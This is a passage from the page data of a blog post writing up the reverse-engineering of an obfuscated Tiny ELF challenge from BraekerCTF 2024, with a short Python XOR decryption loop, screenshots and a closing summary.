class=\"token punctuation\">(</span><span class=\"token string\">\"generated_binary\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x56</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        data<span class=\"token punctuation\">[</span>rdx<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> data<span 
class=\"token punctuation\">[</span>rdx<span class=\"token punctuation\">]</span> <span class=\"token operator\">^</span> data<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span>\n        data<span class=\"token punctuation\">[</span>rdx<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> data<span class=\"token punctuation\">[</span>rdx<span class=\"token punctuation\">]</span> <span class=\"token operator\">^</span> <span class=\"token number\">0x42</span>\n        rdx <span class=\"token operator\">+=</span> <span class=\"token number\">1</span>\n    \n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Reading the instructions in the output binary, the region that previously contained bad data has been replaced with a <code class=\"language-text\">jmp</code> instruction.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1aae7e15040d7e10e72af716a6774346/04784/image-20240225192344388.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35.416666666666664%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABFklEQVQoz42RW0/CQBCF90UtCogxKEU0toVq6G3bbqm9RTAIBjHxwfj//8lxZzQ8mj6czOztzDezorQU0kkIZYbIxwtWOkzg9zwEfZKv8znkwMfyNkNjJqiuJecUazPWMcLzRGF1l0EsbxSaUYynCw+1PmhGEml3hvDEYkWGDdlxEHVsBHod8L59iHzP+Ds7tiA20wpbt8HbQ/NLME6w0ObZYI6KzPuP2syBPJ22ksgvfaztAp9yg2IY8GPCJ3PaS3ouV6bLEZP+by7KqwivTokP/4XR/aP7g+GX2nFORdtSilrPj9r+zveaMGRDapuKEOG7t8JeS53r1g2nneHaKrCd1Yi7Lg+Xfo7mSpS0js9mkFptKH8AWabKo+vRX5YAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1aae7e15040d7e10e72af716a6774346/8ac56/image-20240225192344388.webp 240w,\n/static/1aae7e15040d7e10e72af716a6774346/d3be9/image-20240225192344388.webp 480w,\n/static/1aae7e15040d7e10e72af716a6774346/e46b2/image-20240225192344388.webp 960w,\n/static/1aae7e15040d7e10e72af716a6774346/963af/image-20240225192344388.webp 1174w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1aae7e15040d7e10e72af716a6774346/8ff5a/image-20240225192344388.png 240w,\n/static/1aae7e15040d7e10e72af716a6774346/e85cb/image-20240225192344388.png 480w,\n/static/1aae7e15040d7e10e72af716a6774346/d9199/image-20240225192344388.png 960w,\n/static/1aae7e15040d7e10e72af716a6774346/04784/image-20240225192344388.png 1174w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1aae7e15040d7e10e72af716a6774346/d9199/image-20240225192344388.png\"\n            alt=\"image-20240225192344388\"\n            title=\"image-20240225192344388\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reading the code 
at the jump destination, it was code that outputs the dword <code class=\"language-text\">0xa293a3e</code>, i.e., the bytes <code class=\"language-text\">>:)\\n</code> in little-endian memory order (the string the program printed).</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a2e83298ce2722d6c58238d1fbc90347/712f7/image-20240225192657626.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a2e83298ce2722d6c58238d1fbc90347/8ac56/image-20240225192657626.webp 240w,\n/static/a2e83298ce2722d6c58238d1fbc90347/d3be9/image-20240225192657626.webp 480w,\n/static/a2e83298ce2722d6c58238d1fbc90347/e46b2/image-20240225192657626.webp 960w,\n/static/a2e83298ce2722d6c58238d1fbc90347/a110d/image-20240225192657626.webp 1181w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a2e83298ce2722d6c58238d1fbc90347/8ff5a/image-20240225192657626.png 240w,\n/static/a2e83298ce2722d6c58238d1fbc90347/e85cb/image-20240225192657626.png 480w,\n/static/a2e83298ce2722d6c58238d1fbc90347/d9199/image-20240225192657626.png 960w,\n/static/a2e83298ce2722d6c58238d1fbc90347/712f7/image-20240225192657626.png 1181w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a2e83298ce2722d6c58238d1fbc90347/d9199/image-20240225192657626.png\"\n            
alt=\"image-20240225192657626\"\n            title=\"image-20240225192657626\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The memory state at the moment this code executes matches the state of the decrypted binary loaded into process memory, so we were able to retrieve the flag from this binary data.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 868px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/df079e28b57b9a08c795779dde299826/748b0/image-20240225192737962.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 40%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/df079e28b57b9a08c795779dde299826/8ac56/image-20240225192737962.webp 240w,\n/static/df079e28b57b9a08c795779dde299826/d3be9/image-20240225192737962.webp 480w,\n/static/df079e28b57b9a08c795779dde299826/1ae05/image-20240225192737962.webp 868w\"\n              sizes=\"(max-width: 868px) 100vw, 868px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/df079e28b57b9a08c795779dde299826/8ff5a/image-20240225192737962.png 240w,\n/static/df079e28b57b9a08c795779dde299826/e85cb/image-20240225192737962.png 480w,\n/static/df079e28b57b9a08c795779dde299826/748b0/image-20240225192737962.png 868w\"\n            sizes=\"(max-width: 868px) 100vw, 868px\"\n            type=\"image/png\"\n          />\n          <img\n            
class=\"gatsby-resp-image-image\"\n            src=\"/static/df079e28b57b9a08c795779dde299826/748b0/image-20240225192737962.png\"\n            alt=\"image-20240225192737962\"\n            title=\"image-20240225192737962\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>I had no prior knowledge of Tiny ELF at all, so this was a great learning experience.</p>","fields":{"slug":"/breaker-ctf-2024-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2024-02-25","description":"BraekerCTF 2024 Writeup","tags":["Rev (en)","Pwn (en)","English"],"title":"BraekerCTF 2024 Writeup","socialImage":{"publicURL":"/static/17b75e0e79b65ff02d61decee9d3f5db/breaker-ctf-2024.png"}}}},"pageContext":{"slug":"/breaker-ctf-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}
